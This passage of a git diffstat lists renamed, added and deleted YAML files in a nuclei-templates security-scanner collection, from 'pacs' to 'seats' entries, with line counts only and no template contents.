...-json-9421.yaml => package-json-9423.yaml} | 0 .../pacs-connexion-utilisateur-9424.yaml | 20 + .../Other/pacs-connexion-utilisateur.yaml | 23 - .../Other/pacsone-server-6-6-2-lfi.yaml | 2 +- .../Other/pacsone-server-lfi-9430.yaml | 27 + .../Other/pacsone-server-lfi.yaml | 20 - nuclei-templates/Other/pagekit-installer.yaml | 5 +- ...{api-pagerduty-475.yaml => pagerduty.yaml} | 0 nuclei-templates/Other/pagespeed-detect.yaml | 7 +- ...keover.yaml => pagewiz-takeover-9436.yaml} | 0 nuclei-templates/Other/pahtool-panel.yaml | 4 +- nuclei-templates/Other/pairdrop-panel.yaml | 4 +- .../Other/panabit-default-login.yaml | 34 +- ...aml => panabit-default-password-9441.yaml} | 0 .../Other/panabit-ixcache-default-login.yaml | 15 +- nuclei-templates/Other/panabit-panel.yaml | 4 - ...-rce.yaml => panabit-sy_addmount-rce.yaml} | 0 ...og-fileread.yaml => panalog-fileRead.yaml} | 0 .../panasonic-network-management-9450.yaml | 20 + .../Other/panasonic-network-management.yaml | 21 - .../Other/pandora-fms-console-9451.yaml | 22 + .../Other/pandora-fms-console.yaml | 20 - ...gin.yaml => panos-default-login-9454.yaml} | 0 nuclei-templates/Other/pantheon-takeover.yaml | 5 +- nuclei-templates/Other/pantheon-upstream.yaml | 5 +- nuclei-templates/Other/papercut-ng-panel.yaml | 10 +- .../Other/parallels-hsphere-detect.yaml | 13 +- .../Other/parallels-hsphere-xss.yaml | 7 +- .../Other/parallels-html-client-9462.yaml | 17 - .../Other/parallels-html-client.yaml | 15 + .../Other/parameters-config-9465.yaml | 38 + nuclei-templates/Other/parameters-config.yaml | 36 - nuclei-templates/Other/parentlink-xss.yaml | 8 +- nuclei-templates/Other/parse-dashboard.yaml | 14 +- nuclei-templates/Other/passbolt-panel.yaml | 6 +- nuclei-templates/Other/password-policy.yaml | 13 +- .../Other/password-protected-consolemenu.yaml | 7 +- .../Other/password-protected.yaml | 4 +- nuclei-templates/Other/path-traversal.yaml | 70 + .../Other/payara-micro-server-detect.yaml | 5 +- ...yaml => 
paypal-braintree-token-11856.yaml} | 0 .../payroll-management-system-panel.yaml | 10 +- .../pbootcms-database-file-download-9469.yaml | 36 - .../pbootcms-database-file-download.yaml | 25 + nuclei-templates/Other/pbootcms-detect.yaml | 5 +- nuclei-templates/Other/pcdn-cache-node.yaml | 5 +- nuclei-templates/Other/pdf-embedder.yaml | 2 +- .../Other/pdf-signer-ssti-to-rce-9470.yaml | 22 + .../Other/pdf-signer-ssti-to-rce.yaml | 25 - .../Other/pdf-thumbnail-generator.yaml | 59 + nuclei-templates/Other/pdi-device-page.yaml | 5 +- ...pega-detect.yaml => pega-detect-9474.yaml} | 0 nuclei-templates/Other/pega-web-panel.yaml | 15 +- nuclei-templates/Other/pelco_videoxpert.yaml | 20 + ...n.yaml => pentaho-default-login-9478.yaml} | 0 ...anel-9483.yaml => pentaho-panel-9481.yaml} | 0 .../Other/peoplesoft-default-login.yaml | 10 +- .../peoplesoft_enterprise_peopletools.yaml | 20 + ...rl-scanner.yaml => perl-scanner-9484.yaml} | 0 nuclei-templates/Other/perl-status-9487.yaml | 18 - nuclei-templates/Other/perl-status.yaml | 16 + .../Other/permissions-installer.yaml | 7 +- .../Other/permissions-policy.yaml | 6 +- nuclei-templates/Other/persis-panel.yaml | 10 +- .../Other/petya-malware-variant-1.yaml | 8 +- .../Other/petya-malware-variant-3.yaml | 8 +- .../Other/petya-malware-variant-bitcoin.yaml | 8 +- nuclei-templates/Other/pexip-detect.yaml | 2 +- nuclei-templates/Other/pfsense-login.yaml | 16 +- .../Other/pgadmin-exposure-9488.yaml | 26 - nuclei-templates/Other/pgadmin-exposure.yaml | 23 + .../Other/pghero-dashboard-exposure.yaml | 17 +- nuclei-templates/Other/pgsql-detect.yaml | 91 +- nuclei-templates/Other/phabricator-login.yaml | 5 - ...aml => phalcon-framework-source-9495.yaml} | 0 nuclei-templates/Other/phinx-config.yaml | 4 +- nuclei-templates/Other/phoronix-pane.yaml | 31 - nuclei-templates/Other/phoronix-panel.yaml | 40 + nuclei-templates/Other/photo-gallery.yaml | 6 +- .../Other/php-backup-files-9497.yaml | 51 - nuclei-templates/Other/php-backup-files.yaml | 45 + 
.../Other/php-compatibility-checker.yaml | 6 +- nuclei-templates/Other/php-cs-cache.yaml | 4 +- ...debug-bar.yaml => php-debug-bar-9506.yaml} | 0 .../Other/php-debugbar-exposure.yaml | 7 +- nuclei-templates/Other/php-detect.yaml | 5 +- nuclei-templates/Other/php-errors-9511.yaml | 41 + nuclei-templates/Other/php-errors.yaml | 44 - nuclei-templates/Other/php-fpm-config.yaml | 6 +- nuclei-templates/Other/php-fpm-status.yaml | 3 - nuclei-templates/Other/php-fusion-detect.yaml | 8 +- nuclei-templates/Other/php-ini-9523.yaml | 32 - nuclei-templates/Other/php-ini.yaml | 21 + nuclei-templates/Other/php-mailer.yaml | 9 +- .../Other/php-proxy-detect-9544.yaml | 36 + nuclei-templates/Other/php-proxy-detect.yaml | 32 - .../Other/php-src-disclosure.yaml | 8 +- .../Other/php-timeclock-xss-9554.yaml | 27 + nuclei-templates/Other/php-timeclock-xss.yaml | 31 - ...yaml => php-user-ini-disclosure-9559.yaml} | 0 .../Other/php-zerodium-backdoor-rce.yaml | 20 +- nuclei-templates/Other/phpMyAdmin-setup.yaml | 36 - nuclei-templates/Other/phpbb-installer.yaml | 5 +- .../Other/phpcli-stack-trace.yaml | 7 +- ...t-9499.yaml => phpcollab-detect-9501.yaml} | 0 nuclei-templates/Other/phpcollab-panel.yaml | 13 +- nuclei-templates/Other/phpinfo-9517.yaml | 49 - nuclei-templates/Other/phpinfo-9521.yaml | 69 + nuclei-templates/Other/phpldap-admin.yaml | 3 +- .../Other/phpldapadmin-panel.yaml | 5 +- nuclei-templates/Other/phpldapadmin-xss.yaml | 4 +- .../Other/phpmemcached-admin-panel.yaml | 5 +- .../Other/phpminiadmin-panel.yaml | 9 +- .../Other/phpmyadmin-default-login.yaml | 19 +- .../Other/phpmyadmin-panel-9526.yaml | 33 + .../Other/phpmyadmin-panel-9528.yaml | 37 - ...ort.yaml => phpmyadmin-server-import.yaml} | 0 .../Other/phpmyadmin-setup-9531.yaml | 30 + nuclei-templates/Other/phpok-sqli-9538.yaml | 34 + .../Other/phppgadmin-panel-9539.yaml | 19 - .../Other/phppgadmin-panel-9542.yaml | 26 + .../Other/phppgadmin-version.yaml | 16 +- nuclei-templates/Other/phpsec-config.yaml | 10 +- 
nuclei-templates/Other/phpstan-config.yaml | 15 +- nuclei-templates/Other/phpunit-9557.yaml | 24 - .../Other/phpunit-result-cache-exposure.yaml | 5 +- nuclei-templates/Other/phpunit.yaml | 20 + nuclei-templates/Other/phpwiki-lfi-9564.yaml | 23 + nuclei-templates/Other/phpwiki-lfi-9568.yaml | 25 - nuclei-templates/Other/phpwind-installer.yaml | 5 +- nuclei-templates/Other/phuket-cms-sqli.yaml | 5 +- ...e-detect.yaml => pi-hole-detect-9581.yaml} | 0 nuclei-templates/Other/pichome-panel.yaml | 10 +- ...PI-key.yaml => pictatic-api-key-9576.yaml} | 0 .../Other/pieregister-open-redirect.yaml | 4 +- .../pieregister-plugin-open-redirect.yaml | 19 - nuclei-templates/Other/pikpikcussti.yaml | 24 + .../Other/pingdom-takeover-9585.yaml | 19 + nuclei-templates/Other/pingdom-takeover.yaml | 16 - .../Other/pinpoint-unauth-9590.yaml | 26 + nuclei-templates/Other/pinpoint-unauth.yaml | 31 - .../Other/pipeline-configuration.yaml | 5 +- nuclei-templates/Other/pipfile-config.yaml | 9 +- nuclei-templates/Other/pipfile-lock.yaml | 5 +- nuclei-templates/Other/piwigo-detect.yaml | 5 +- nuclei-templates/Other/piwigo-panel.yaml | 30 +- nuclei-templates/Other/piwik-installer.yaml | 5 +- nuclei-templates/Other/pixelyoursite.yaml | 4 +- .../Other/planet-estream-panel.yaml | 15 +- nuclei-templates/Other/plastic-scm-login.yaml | 6 +- nuclei-templates/Other/plausible-panel.yaml | 5 +- .../Other/plesk-obsidian-login.yaml | 12 +- nuclei-templates/Other/plesk-obsidian.yaml | 12 +- nuclei-templates/Other/plesk-onyx-login.yaml | 52 - nuclei-templates/Other/plesk-onyx.yaml | 19 + .../{plesk-stat.yaml => plesk-stat-9604.yaml} | 0 .../Other/plone-cms-detect-9607.yaml | 26 + nuclei-templates/Other/plone-cms-detect.yaml | 23 - nuclei-templates/Other/plugin.yaml | 49 - nuclei-templates/Other/pma_unauth.yaml | 2 - .../Other/pmb-directory-traversal-9611.yaml | 22 + .../Other/pmb-directory-traversal.yaml | 27 - nuclei-templates/Other/pmb-sqli.yaml | 7 +- nuclei-templates/Other/pmm-installer.yaml | 5 +- 
nuclei-templates/Other/pnpm-lock.yaml | 4 +- .../Other/pollbot-redirect-9622.yaml | 26 - nuclei-templates/Other/pollbot-redirect.yaml | 23 + ...com-login.yaml => polycom-login-9627.yaml} | 0 nuclei-templates/Other/polylang.yaml | 2 +- .../Other/pony-stealer-malware.yaml | 8 +- nuclei-templates/Other/pop3-detect.yaml | 11 +- nuclei-templates/Other/popup-builder.yaml | 2 +- nuclei-templates/Other/popup-maker.yaml | 2 +- ...y.yaml => portainer-init-deploy-9628.yaml} | 0 nuclei-templates/Other/portainer-panel.yaml | 8 +- nuclei-templates/Other/posh-c2-jarm.yaml | 5 +- nuclei-templates/Other/posh-c2.yaml | 6 +- .../Other/possible-AEM-secrets.yaml | 46 + nuclei-templates/Other/post-smtp.yaml | 4 +- nuclei-templates/Other/post-types-order.yaml | 2 +- .../Other/posteio-admin-panel.yaml | 4 +- .../Other/postgres-default-logins.yaml | 8 +- .../Other/postgres-exporter-metrics.yaml | 7 +- .../Other/posthog-admin-panel.yaml | 12 +- .../Other/postman-login-check.yaml | 5 +- .../postmessage-outgoing-tracker-9636.yaml | 65 - .../Other/postmessage-outgoing-tracker.yaml | 63 + .../Other/postmessage-tracker-9639.yaml | 66 + .../Other/postmessage-tracker.yaml | 65 - .../Other/powercom-network-manager.yaml | 8 +- .../Other/powercreator-cms-rce-9644.yaml | 41 + .../Other/powercreator-cms-rce.yaml | 45 - nuclei-templates/Other/powerjob-panel.yaml | 9 +- ...ogic-ion.yaml => powerlogic-ion-9648.yaml} | 0 nuclei-templates/Other/powerware-malware.yaml | 8 +- .../Other/pqube-power-analyzers.yaml | 5 +- nuclei-templates/Other/pre-commit-config.yaml | 16 +- .../Other/premium-addons-for-elementor.yaml | 4 +- .../Other/prestashop-apmarketplace-sqli.yaml | 11 +- ...etect.yaml => prestashop-detect-9651.yaml} | 0 .../Other/prestashop-installer.yaml | 5 +- nuclei-templates/Other/pretty-link.yaml | 2 +- .../Other/prison_management_system.yaml | 20 + nuclei-templates/Other/pritunl-panel.yaml | 8 +- ...te-key-9655.yaml => private-key-9656.yaml} | 0 nuclei-templates/Other/privx-panel.yaml | 7 +- 
.../Other/processmaker-lfi-9659.yaml | 23 + nuclei-templates/Other/processmaker-lfi.yaml | 28 - .../Other/processwire-installer.yaml | 6 +- nuclei-templates/Other/processwire-login.yaml | 12 +- nuclei-templates/Other/procfile-config.yaml | 8 +- ...-fields-for-woocommerce-file-download.yaml | 2 +- nuclei-templates/Other/production-log.yaml | 8 +- .../Other/production-logs-9664.yaml | 32 + nuclei-templates/Other/production-logs.yaml | 39 - nuclei-templates/Other/proftpd-config.yaml | 6 +- .../Other/proftpd-server-detect.yaml | 60 +- .../Other/project-insight-login.yaml | 4 - nuclei-templates/Other/prometheus-config.yaml | 5 - .../prometheus-exporter-detect-9676.yaml | 29 - .../Other/prometheus-exporter-detect.yaml | 28 + .../Other/prometheus-exporter.yaml | 6 +- ...-flags.yaml => prometheus-flags-9687.yaml} | 0 .../Other/prometheus-flags-endpoint-9685.yaml | 37 + .../Other/prometheus-metrics.yaml | 28 +- .../prometheus-pushgateway-exposed-panel.yaml | 8 +- .../Other/prometheus-targets-9690.yaml | 29 + .../Other/prometheus-targets-endpoint.yaml | 26 + .../Other/prometheus-targets.yaml | 33 - .../Other/promothoues-panel (copy 1).yaml | 17 + nuclei-templates/Other/promothoues-panel.yaml | 17 - .../proofpoint-protection-server-panel.yaml | 8 +- .../Other/proposify-takeover-9695.yaml | 16 + .../Other/proposify-takeover.yaml | 18 - .../Other/prostore-open-redirect.yaml | 2 +- .../Other/prototype-pollution-check-9697.yaml | 96 - .../Other/prototype-pollution-check.yaml | 97 + ...ider-path-9702.yaml => provider-path.yaml} | 0 nuclei-templates/Other/proxmox-panel.yaml | 8 +- .../Other/proxy-wpad-exposure.yaml | 15 +- .../Other/prtg-default-login.yaml | 5 +- ...detect-9703.yaml => prtg-detect-9706.yaml} | 0 ...erprint.yaml => ptr-fingerprint-9707.yaml} | 0 .../Other/public-tomcat-manager-9709.yaml | 10 +- nuclei-templates/Other/pubspec-config.yaml | 18 +- nuclei-templates/Other/pulmi-login-check.yaml | 5 +- .../Other/pulsar-admin-console.yaml | 14 +- 
.../Other/pulsar-adminui-panel.yaml | 14 +- .../Other/pulsar360-admin-panel.yaml | 9 +- .../Other/pulse-secure-panel-9714.yaml | 27 - .../Other/pulse-secure-panel.yaml | 20 + ...l => puppet-node-manager-detect-9720.yaml} | 0 .../Other/puppetboard-panel-9716.yaml | 45 + nuclei-templates/Other/puppetboard-panel.yaml | 22 - .../Other/puppetdb-dashboard.yaml | 14 +- .../Other/puppetserver-detect-9721.yaml | 30 + .../Other/puppetserver-detect.yaml | 40 - nuclei-templates/Other/pupyc2.yaml | 4 +- .../Other/pure-storage-login.yaml | 4 - nuclei-templates/Other/put-m-enb.yaml | 29 - .../Other/put-method-enabled.yaml | 24 + nuclei-templates/Other/putMethod-1.yaml | 36 + nuclei-templates/Other/putMethod-2.yaml | 37 + ...yaml => putty-private-key-disclosure.yaml} | 0 nuclei-templates/Other/pyload-panel.yaml | 8 +- nuclei-templates/Other/pypi-token.yaml | 5 +- .../Other/pypicloud-panel-9734.yaml | 35 + nuclei-templates/Other/pypicloud-panel.yaml | 28 - nuclei-templates/Other/pypiserver-detect.yaml | 5 +- ...36.yaml => pyproject-disclosure-9737.yaml} | 0 nuclei-templates/Other/pyproject-toml.yaml | 7 +- .../Other/pyramid-debug-toolbar-9740.yaml | 8 +- ...=> pyspider-unauthorized-access-9743.yaml} | 0 ...ml => python-app-sql-exceptions-9744.yaml} | 0 .../Other/python-metrics-9747.yaml | 25 + nuclei-templates/Other/python-metrics.yaml | 29 - nuclei-templates/Other/python-scanner.yaml | 13 +- nuclei-templates/Other/qBittorrent-panel.yaml | 8 +- nuclei-templates/Other/qcubed-xss.yaml | 5 - .../Other/qdpm-info-leak-9754.yaml | 29 + nuclei-templates/Other/qdpm-info-leak.yaml | 25 - nuclei-templates/Other/qdpm-login-panel.yaml | 8 +- ...ng-next-generation-firewall-rce-9755.yaml} | 0 .../Other/qibocms-file-download.yaml | 5 +- .../Other/qihang-media-disclosure-9762.yaml | 29 + .../Other/qihang-media-disclosure-9764.yaml | 23 - .../Other/qizhi-fortressaircraft-unauth.yaml | 6 +- nuclei-templates/Other/qlik-sense-server.yaml | 14 +- nuclei-templates/Other/qmail-admin-login.yaml | 16 +- 
.../Other/qnap-photostation-panel.yaml | 13 +- nuclei-templates/Other/qnap-qts-panel.yaml | 27 +- nuclei-templates/Other/qnap_nas_detect.yaml | 4 - .../Other/qualcomm-voip-router.yaml | 46 +- nuclei-templates/Other/qualtrics-login.yaml | 7 +- .../Other/quantum-scalar-detect.yaml | 11 +- nuclei-templates/Other/quasar-rat-c2.yaml | 5 +- .../Other/{2378487680.yaml => quasar.yaml} | 0 nuclei-templates/Other/questdb-console.yaml | 17 +- nuclei-templates/Other/quilium-panel.yaml | 5 +- .../qvidium-management-system-exposed.yaml | 6 +- .../qvisdvr-deserialization-rce-9774.yaml | 46 + .../Other/qvisdvr-deserialization-rce.yaml | 42 - .../Other/r-webserver-login-9956.yaml | 22 - nuclei-templates/Other/r-webserver-login.yaml | 19 + .../Other/rabbitmq-dashboard-9776.yaml | 17 - .../Other/rabbitmq-dashboard-9779.yaml | 15 + .../Other/rabbitmq-default-admin-9782.yaml | 27 - .../Other/rabbitmq-default-admin.yaml | 25 + ....yaml => rabbitmq-default-login-9783.yaml} | 0 nuclei-templates/Other/rabbitmq-detect.yaml | 62 +- .../Other/rabbitmq-exporter-metrics.yaml | 7 +- .../Other/rack-mini-profiler-9792.yaml | 21 + .../Other/rack-mini-profiler.yaml | 21 - nuclei-templates/Other/racksnet-login.yaml | 9 +- nuclei-templates/Other/rackup-config-ru.yaml | 7 +- nuclei-templates/Other/radius-manager.yaml | 6 +- nuclei-templates/Other/raidenmaild.yaml | 20 + .../Other/rails-database-config.yaml | 8 +- nuclei-templates/Other/rails-debug-mode.yaml | 4 +- .../rails-secret-token-disclosure-9810.yaml | 22 + .../Other/rails-secret-token-disclosure.yaml | 25 - ...ls6-xss-9797.yaml => rails6-xss-9798.yaml} | 0 .../Other/rainloop-default-login-9811.yaml | 49 + .../Other/rainloop-default-login.yaml | 55 - nuclei-templates/Other/rancher-dashboard.yaml | 7 +- ...n.yaml => rancher-default-login-9816.yaml} | 0 nuclei-templates/Other/rancher-panel.yaml | 5 - .../Other/ranger-default-login-9827.yaml | 39 + .../Other/ranger-default-login.yaml | 39 - .../Other/ranger-detection-9829.yaml | 62 +- 
nuclei-templates/Other/ranger.yaml | 20 + .../Other/raspberry-shake-config.yaml | 59 +- .../Other/raspberrymatic-panel.yaml | 13 +- nuclei-templates/Other/ray-dashboard.yaml | 7 +- .../Other/razorpay-client-id.yaml | 5 +- .../Other/razorpay-clientid-disclosure.yaml | 4 +- .../Other/rcdevs-webadm-panel.yaml | 5 +- .../Other/rce-shellshock-user-agent-9831.yaml | 21 - .../Other/rce-shellshock-user-agent-9833.yaml | 17 + .../Other/rce-via-java-deserialization.yaml | 6 +- nuclei-templates/Other/rce.yaml | 5 +- .../Other/rconfig-file-upload.yaml | 72 + nuclei-templates/Other/rconfig-rce.yaml | 16 +- nuclei-templates/Other/rdap-whois.yaml | 106 +- .../{rdp-detect.yaml => rdp-detect-9839.yaml} | 0 nuclei-templates/Other/rdweb-panel.yaml | 10 +- nuclei-templates/Other/reactapp-env-js.yaml | 10 +- nuclei-templates/Other/readme-md.yaml | 5 +- .../Other/readme-takeover-9843.yaml | 16 + nuclei-templates/Other/readme-takeover.yaml | 15 - ...er.yaml => readthedocs-takeover-9846.yaml} | 0 .../Other/really-simple-captcha.yaml | 2 +- nuclei-templates/Other/really-simple-ssl.yaml | 2 +- .../Other/realor-gwt-system-sqli.yaml | 8 +- nuclei-templates/Other/red-lion-panel.yaml | 5 +- nuclei-templates/Other/redash-detection.yaml | 27 - nuclei-templates/Other/redash-installer.yaml | 5 +- nuclei-templates/Other/redash-panel.yaml | 18 + nuclei-templates/Other/redcap-detector.yaml | 5 - nuclei-templates/Other/reddittop-rss-xss.yaml | 5 +- .../Other/redhat-satellite-panel.yaml | 10 +- nuclei-templates/Other/redirection.yaml | 2 +- nuclei-templates/Other/redis-config.yaml | 15 +- .../Other/redis-default-logins.yaml | 6 +- nuclei-templates/Other/redis-detect.yaml | 13 +- .../Other/redis-enterprise-panel.yaml | 6 +- .../Other/redis-exception-error.yaml | 5 +- .../Other/redis-honeypot-detect.yaml | 4 +- nuclei-templates/Other/redis.yaml | 27 + .../Other/redmine-cli-detect-9854.yaml | 9 +- nuclei-templates/Other/redmine-config.yaml | 13 +- nuclei-templates/Other/redmine-panel.yaml | 4 +- 
nuclei-templates/Other/redmine-settings.yaml | 8 +- nuclei-templates/Other/redux-framework.yaml | 4 +- nuclei-templates/Other/referrer-policy.yaml | 6 +- nuclei-templates/Other/reflected-xss.yaml | 39 - nuclei-templates/Other/reflection-ssti.yaml | 51 - nuclei-templates/Other/reflection.yaml | 49 +- .../Other/regenerate-thumbnails.yaml | 2 +- nuclei-templates/Other/regify-panel.yaml | 5 +- .../Other/rekognition-image-validation.yaml | 7 +- nuclei-templates/Other/remedy-axis-login.yaml | 7 +- ...t.yaml => remkon-manager-detect-9857.yaml} | 0 .../Other/remkon-manager-panel.yaml | 10 +- .../Other/remote-auth-timeout.yaml | 16 +- .../Other/remote-ui-login-9861.yaml | 19 + nuclei-templates/Other/remote-ui-login.yaml | 22 - nuclei-templates/Other/remote_support.yaml | 22 + .../Other/repetier-server-panel.yaml | 10 +- .../Other/reportico-admin-panel.yaml | 8 +- .../Other/request-based-interaction.yaml | 6 +- .../Other/residential-gateway-login.yaml | 10 +- ...aml => resin-inputfile-fileread-9868.yaml} | 0 .../Other/resin-viewfile-lfr-9875.yaml | 25 + .../Other/resin-viewfile-lfr.yaml | 27 - nuclei-templates/Other/response-ssrf.yaml | 127 - .../Other/rethinkdb-admin-console.yaml | 14 +- nuclei-templates/Other/retool-login.yaml | 9 +- .../Other/revoked-ssl-certificate.yaml | 5 +- nuclei-templates/Other/rg-uac-panel.yaml | 10 +- nuclei-templates/Other/rg-uac.yaml | 24 + nuclei-templates/Other/rg-uac_firmware.yaml | 20 + .../Other/rhadamanthys-stealer-panel.yaml | 5 +- ...etect.yaml => rhymix-cms-detect-9877.yaml} | 0 nuclei-templates/Other/riak-detect.yaml | 64 +- .../ricoh-aficio-mp-w5100-webserver.yaml | 6 +- .../Other/ricoh-mp-c3004ex-webserver.yaml | 6 +- .../Other/ricoh-pro8320-webserver.yaml | 6 +- ...ord.yaml => ricoh-weak-password-9883.yaml} | 0 nuclei-templates/Other/riseup-panel.yaml | 7 +- .../Other/robomongo-credential-9885.yaml | 33 - .../Other/robomongo-credential.yaml | 28 + nuclei-templates/Other/robots-9887.yaml | 26 + .../Other/robots-txt-endpoint.yaml | 23 
+- nuclei-templates/Other/robots.txt.yaml | 35 - nuclei-templates/Other/rocketchat-panel.yaml | 6 +- ...ml => rocketmq-console-exposure-9894.yaml} | 0 .../Other/rockmongo-default-credentials.yaml | 5 - ...yaml => rockmongo-default-login-9899.yaml} | 0 ...mongo-xss.yaml => rockmongo-xss-9902.yaml} | 0 nuclei-templates/Other/rollup-js-config.yaml | 7 +- nuclei-templates/Other/room-alert-detect.yaml | 10 +- .../Other/roundcube-log-disclosure-9905.yaml | 25 - .../Other/roundcube-log-disclosure-9906.yaml | 21 + .../Other/roundcube-webmail-portal.yaml | 11 +- .../Other/routeros-login-9909.yaml | 4 - nuclei-templates/Other/routes-ini.yaml | 40 +- nuclei-templates/Other/roxy-fileman.yaml | 17 +- .../Other/roxyfileman-fileupload.yaml | 20 +- .../Other/royalevent-management-panel.yaml | 8 +- .../Other/royalevent-management-xss.yaml | 10 +- .../Other/royalevent-stored-xss.yaml | 5 +- .../Other/rpcbind-portmapper-detect.yaml | 13 +- .../Other/rsa-self-service-9910.yaml | 25 - .../Other/rsa-self-service-9912.yaml | 23 + .../Other/rseenet-default-login-9913.yaml | 35 - .../Other/rseenet-default-login.yaml | 39 + ...t-detect.yaml => rseenet-detect-9916.yaml} | 0 nuclei-templates/Other/rsshub-detect.yaml | 5 +- ...o-detect.yaml => rstudio-detect-9919.yaml} | 0 .../Other/rsyncd-service-detect.yaml | 12 +- nuclei-templates/Other/rt-n16.yaml | 20 + nuclei-templates/Other/rtsp-detect.yaml | 15 +- nuclei-templates/Other/rubocop-config.yaml | 9 +- .../ruby-on-rails-framework-exceptions.yaml | 3 - nuclei-templates/Other/ruby-open-rce.yaml | 36 - nuclei-templates/Other/ruby-rail-storage.yaml | 6 +- nuclei-templates/Other/rubygems-key.yaml | 5 +- .../Other/ruckus-unleashed-panel.yaml | 14 +- .../Other/ruckus-wireless-admin-login.yaml | 15 +- .../Other/ruckus-wireless-default-login.yaml | 14 +- .../Other/ruijie-EG-fileDown.yaml | 2 - nuclei-templates/Other/ruijie-EWEB-rce.yaml | 5 +- ...-passLeak.yaml => ruijie-eg-passleak.yaml} | 0 .../Other/ruijie-eg-password-leak-9922.yaml | 45 + 
.../Other/ruijie-eg-password-leak.yaml | 39 - .../Other/ruijie-eg-rce-9925.yaml | 54 + .../Other/ruijie-eg-rce-9929.yaml | 55 - .../ruijie-information-disclosure-9931.yaml | 26 + .../Other/ruijie-information-disclosure.yaml | 22 - .../Other/ruijie-nbr-fileupload.yaml | 22 +- ...aml => ruijie-nbr1300g-exposure-9936.yaml} | 0 .../Other/ruijie-networks-lfi-9941.yaml | 31 + .../Other/ruijie-networks-lfi.yaml | 34 - .../Other/ruijie-networks-rce-9946.yaml | 5 - .../Other/ruijie-password-leak.yaml | 5 +- .../Other/ruijie-phpinfo-9952.yaml | 22 + nuclei-templates/Other/ruijie-phpinfo.yaml | 21 - nuclei-templates/Other/rundeck-log4j.yaml | 36 +- nuclei-templates/Other/rundeck-login.yaml | 10 +- nuclei-templates/Other/rundeck.yaml | 22 + .../Other/rustici-content-controller.yaml | 10 +- nuclei-templates/Other/rusty-joomla.yaml | 5 - .../Other/{nuclei_template.yaml => rxss.yaml} | 0 nuclei-templates/Other/s14.yaml | 20 + nuclei-templates/Other/s3-bucket.yaml | 3 - ...3-detect-9964.yaml => s3-detect-9963.yaml} | 0 .../Other/s3-subtakeover-9968.yaml | 20 + .../Other/s3-subtakeover-9969.yaml | 24 - nuclei-templates/Other/s3-torrent.yaml | 8 +- nuclei-templates/Other/s3cfg-config.yaml | 15 +- nuclei-templates/Other/s3hunter-9966.yaml | 14 - nuclei-templates/Other/s3hunter.yaml | 13 + nuclei-templates/Other/safe-svg.yaml | 2 +- nuclei-templates/Other/sage-detect.yaml | 5 - nuclei-templates/Other/sage-panel.yaml | 13 +- .../Other/saia-web-server-info-9980.yaml | 7 +- .../Other/salesforce-aura-9983.yaml | 19 + nuclei-templates/Other/salesforce-aura.yaml | 19 - .../Other/salesforce-credentials.yaml | 16 +- nuclei-templates/Other/saltgui-panel.yaml | 9 +- .../Other/saltstack-config-panel.yaml | 67 +- nuclei-templates/Other/samba-config-9987.yaml | 24 + nuclei-templates/Other/samba-config.yaml | 20 - nuclei-templates/Other/samba-detect-9990.yaml | 20 - nuclei-templates/Other/samba-detect.yaml | 25 + ...-panel.yaml => samba-swat-panel-9991.yaml} | 0 
.../Other/samsung-printer-default-login.yaml | 5 +- .../Other/samsung-printer-detect-9993.yaml | 24 - .../Other/samsung-printer-detect.yaml | 20 + .../Other/samsung-smarttv-debug.yaml | 5 +- ...ung-wlan-ap-default-credentials-9995.yaml} | 0 .../Other/samsung-wlan-ap-rce.yaml | 18 +- .../samsung-wlan-default-login-10017.yaml | 35 + .../Other/samsung-wlan-default-login.yaml | 38 - ...-BA-rce.yaml => sangfor-ba-rce-10020.yaml} | 0 .../Other/sangfor-ba-rce-10021.yaml | 9 +- nuclei-templates/Other/sangfor-cphp-rce.yaml | 4 +- .../Other/sangfor-edr-rce-10025.yaml | 28 - .../Other/sangfor-edr-rce-10029.yaml | 24 + nuclei-templates/Other/sangfor-login-rce.yaml | 6 +- nuclei-templates/Other/sangfor.yaml | 24 + .../Other/sanhui-smg-file-read.yaml | 29 +- .../Other/sap-cloud-analytics.yaml | 10 +- ...aml => sap-hana-xsengine-panel-10037.yaml} | 0 .../Other/sap-igs-detect-10039.yaml | 39 - nuclei-templates/Other/sap-igs-detect.yaml | 33 + ...t.yaml => sap-netweaver-detect-10046.yaml} | 0 .../Other/sap-netweaver-info-leak-10051.yaml | 24 + .../Other/sap-netweaver-info-leak.yaml | 28 - .../Other/sap-netweaver-portal.yaml | 5 +- nuclei-templates/Other/sap-netweaver-rce.yaml | 20 + .../Other/sap-netweaver-webgui-10059.yaml | 20 + .../Other/sap-netweaver-webgui.yaml | 23 - nuclei-templates/Other/sap-public-admin.yaml | 2 +- nuclei-templates/Other/sap-recon-detect.yaml | 1 - .../Other/sap-redirect-10064.yaml | 22 + .../Other/sap-router-info-leak.yaml | 6 +- .../Other/sap-spartacus-detect.yaml | 5 +- .../Other/sap-successfactors-detect.yaml | 18 +- ...078.yaml => sap-web-dispatcher-10075.yaml} | 0 .../sap-web-dispatcher-admin-portal.yaml | 8 +- ...i-panel.yaml => sapfiori-panel-10033.yaml} | 0 .../Other/sar2html-rce-10082.yaml | 22 - nuclei-templates/Other/sar2html-rce.yaml | 27 + nuclei-templates/Other/sas-login-panel.yaml | 13 +- nuclei-templates/Other/sass-lint.yaml | 5 +- .../Other/sassy-social-share.yaml | 13 +- nuclei-templates/Other/satis-repository.yaml | 5 +- 
.../Other/sauce-access-token.yaml | 5 +- .../Other/sauter-login-10088.yaml | 21 + nuclei-templates/Other/sauter-login.yaml | 24 - .../Other/sauter-moduwebvision-panel.yaml | 8 +- .../Other/sceditor-detect-10093.yaml | 23 - .../Other/sceditor-detect-10094.yaml | 20 + .../Other/scheduledtasks-spring-boot.yaml | 2 - nuclei-templates/Other/scp-admin.yaml | 13 +- nuclei-templates/Other/screenshot.yaml | 16 +- .../Other/scribble-diffusion-panel.yaml | 5 +- nuclei-templates/Other/scriptcase-panel.yaml | 7 +- .../Other/scriptcase-prod-login.yaml | 7 +- .../Other/scrutinizer-config.yaml | 7 +- .../Other/scs-landfill-control-10098.yaml | 26 + .../Other/scs-landfill-control.yaml | 23 - nuclei-templates/Other/scx-6555n.yaml | 20 + nuclei-templates/Other/seacms-rce-10102.yaml | 25 + nuclei-templates/Other/seacms-rce.yaml | 26 - nuclei-templates/Other/seacms-sqli-10103.yaml | 37 - nuclei-templates/Other/seacms-sqli.yaml | 25 + nuclei-templates/Other/seafile-panel.yaml | 28 +- ...edia-sqli.yaml => seagate-media-sqli.yaml} | 0 nuclei-templates/Other/seagate-nas-login.yaml | 8 +- nuclei-templates/Other/searchbar.yaml | 42 - nuclei-templates/Other/searches.yaml | 42 + nuclei-templates/Other/seats-login-10107.yaml | 22 + nuclei-templates/Other/seats-login.yaml | 21 